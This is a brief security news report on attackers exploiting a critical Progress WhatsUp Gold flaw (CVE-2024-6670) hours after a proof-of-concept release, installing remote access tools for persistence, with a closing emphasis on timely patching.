Adrian Johnson
TLDR:
Key Points:
- Malicious actors are exploiting a critical flaw in Progress WhatsUp Gold just hours after a PoC release.
- The vulnerabilities allow attackers to retrieve encrypted passwords and gain persistence on Windows hosts.
Malicious actors are taking advantage of a critical flaw in Progress Software WhatsUp Gold, which allows unauthenticated attackers to retrieve encrypted passwords. The attacks began just five hours after a proof-of-concept (PoC) exploit was released for CVE-2024-6670 by security researcher Sina Kheirkhah. Progress had patched the vulnerabilities earlier in August, but some organizations were unable to apply the patches quickly enough, leading to immediate incidents following the PoC’s publication.
The attacks observed involved bypassing WhatsUp Gold authentication to exploit Active Monitor PowerShell Script, enabling the downloading of remote access tools for persistence on Windows hosts. Trend Micro researchers noted the use of tools like Atera Agent and Splashtop Remote. While no follow-on exploitation actions have been detected, the involvement of ransomware actors is suspected.
This is not the first time vulnerabilities in WhatsUp Gold have been actively weaponized in the wild. In a similar incident last month, exploitation attempts were made against another critical bug in the software. Trend Micro also reported exploitation of a security flaw in Atlassian Confluence to deliver the Godzilla web shell.
The disclosure of these attacks highlights the importance of patch management and proactive security measures to protect organizations from opportunistic threats exploiting known vulnerabilities.
